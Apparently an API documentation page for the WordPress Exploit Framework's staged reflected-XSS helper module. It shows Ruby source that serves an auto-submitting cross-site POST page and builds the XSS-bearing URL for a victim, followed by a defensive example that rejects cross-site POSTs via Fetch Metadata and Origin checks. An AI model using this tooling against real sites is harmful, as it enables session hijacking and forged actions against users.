module Wpxf::WordPress::StagedReflectedXss

Provides reusable functionality for reflected XSS modules.

Public Class Methods

new()

Initialize a new instance of {StagedReflectedXss}.

Calls superclass method Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 8
def initialize
  super
  register_option(
    StringOption.new(
      name: 'initial_req_path',
      desc: 'The path to be used to identify the initial request',
      required: true,
      default: Utility::Text.rand_alpha(rand(5..10))
    )
  )
end

Public Instance Methods

create_basic_post_script(url, fields)

Create a basic POST script with the specified fields. All values in the script will be wrapped in double quotes.

@param url [String] the vulnerable URL.
@param fields [Hash] the fields and values to inject into the script.

# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 52
def create_basic_post_script(url, fields)
  json = ''
  fields.each_with_index do |(k, v), i|
    if i < fields.size - 1
      json += "\"#{k}\": \"#{v}\",\n"
      next
    end

    json += "\"#{k}\": \"#{v}\"\n"
  end

  %|
    <html><head></head><body><script>
      #{js_post}
      post('#{url}', {
        #{json}
      });
    </script></body></html>
  |
end

initial_req_path()

@return [String] the path to use for the initial request.

# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 21
def initial_req_path
  normalized_option_value('initial_req_path')
end

initial_script()

@return [String] the initial script that should be served to automate a form submission to the vulnerable page.

# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 45
def initial_script
  nil
end

on_http_request(path, params, headers)

Invoked when an HTTP request is made to the server.

@param path [String] the path requested.
@param params [Hash] the query string parameters.
@param headers [Hash] the HTTP headers.
@return [String] the response body to send to the client.

Calls superclass method
# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 30
def on_http_request(path, params, headers)
  if path.eql? normalize_uri(xss_path, initial_req_path)
    emit_info 'Initial request received...'
    { type: 'text/html', body: initial_script }
  else
    super
  end
end

run()

Run the module.

@return [Boolean] true if successful.

Calls superclass method Wpxf::WordPress::ReflectedXss#run
# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 75
def run
  if initial_script.nil?
    raise 'Required method "initial_script" has not been implemented'
  end

  super
end

url_with_xss()

@return [String] the URL to send the user to which contains the XSS vector.

# File lib/wpxf/wordpress/staged_reflected_xss.rb, line 40
def url_with_xss
  normalize_uri(xss_url, initial_req_path)
end
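
In the flow documented above, the page returned by `initial_script` (built with `create_basic_post_script`) auto-submits a POST from another origin to the vulnerable URL. The Ruby check below is an added example, not Wpxf code: it shows how a site front end can refuse such cross-site POSTs using the Fetch Metadata and Origin headers. `SITE_ORIGIN`, the function names and the sample request are assumptions constructed for illustration.

```ruby
require 'uri'

# Added example, not Wpxf code. SITE_ORIGIN and all sample values are constructed.
SITE_ORIGIN = 'https://blog.example.test'
STATE_CHANGING = %w[POST PUT PATCH DELETE].freeze

# Reduce a URL to scheme://host[:port]; nil when it is not an absolute URL.
def origin_of(url)
  uri = URI.parse(url.to_s)
  return nil unless uri.scheme && uri.host

  base = "#{uri.scheme}://#{uri.host}".downcase
  uri.port == uri.default_port ? base : "#{base}:#{uri.port}"
rescue URI::InvalidURIError
  nil
end

# Verdict for one request: :allow or :reject.
# A staging page that auto-submits a form arrives as a state-changing request
# whose initiator is another site, which is what this rejects.
def cross_site_post_verdict(method, headers, site_origin = SITE_ORIGIN)
  return :allow unless STATE_CHANGING.include?(method.to_s.upcase)

  h = headers.transform_keys { |k| k.to_s.downcase }

  # Fetch Metadata: the browser states who initiated the request.
  case h['sec-fetch-site']
  when 'same-origin', 'none' then return :allow
  when 'same-site', 'cross-site' then return :reject # strict: sibling hosts too
  end

  # Browsers without Fetch Metadata: compare Origin, then Referer.
  # Strict choice: a POST carrying neither header is rejected.
  source = h['origin'] || h['referer']
  return :reject if source.nil?

  own = origin_of(site_origin)
  !own.nil? && origin_of(source) == own ? :allow : :reject
end

if __FILE__ == $PROGRAM_NAME
  # Constructed request, shaped like the auto-submitted POST from a staging page.
  staged = { 'Sec-Fetch-Site' => 'cross-site', 'Origin' => 'https://staging.example.net' }
  puts cross_site_post_verdict('POST', staged)
end
```

This closes only the cross-site POST delivery path; the reflected parameter itself still needs output escaping in the affected plugin or theme.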